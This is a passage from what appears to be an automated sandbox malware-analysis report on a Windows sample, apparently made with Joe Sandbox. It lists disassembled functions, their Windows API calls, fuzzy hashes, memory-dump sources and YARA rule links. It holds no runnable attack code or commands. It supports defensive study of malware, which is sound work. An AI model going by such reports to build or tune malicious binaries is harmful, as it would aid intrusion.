                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                                                                                                                                                                                                                                                                                                                                                • __itow.LIBCMT ref: 004699CD
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                                                                                                                                                                                                                                                                                                                                                • __itow.LIBCMT ref: 00469A97
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$__itow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3379773720-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2782032738-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                                                                                                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                                                                                                                                                                                                                                                                                                                                                • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                                                                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                                                                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3058430110-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 004503C8
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Proc$Parent
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2351499541-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00461F53 Relevance: 6.1, APIs: 4, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004367CF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004367E1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00461F92
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00461FC1
                                                                                                                                                                                                                                                                                                                                                                                                                                • __itow.LIBCMT ref: 00461FD2
                                                                                                                                                                                                                                                                                                                                                                                                                                • __itow.LIBCMT ref: 00462016
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$__itow$_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3055246884-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 680069b6984fce1f78b4a73a7cc87c87b9b9bd06752f3eaec9f9348e36ef7987
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2d6fee67be8c1f37eead957347fb4951583f5dfa804ed1177570fd3be5bc4abd
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 680069b6984fce1f78b4a73a7cc87c87b9b9bd06752f3eaec9f9348e36ef7987
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F2127327003096BDB20EE69DD85EAF3768EB88714F00456BFD14AB241D679DC4587A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                                                                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                                                                                                                                                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                                                                                                                                                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Message$Peek$DispatchTranslate
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1795658109-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
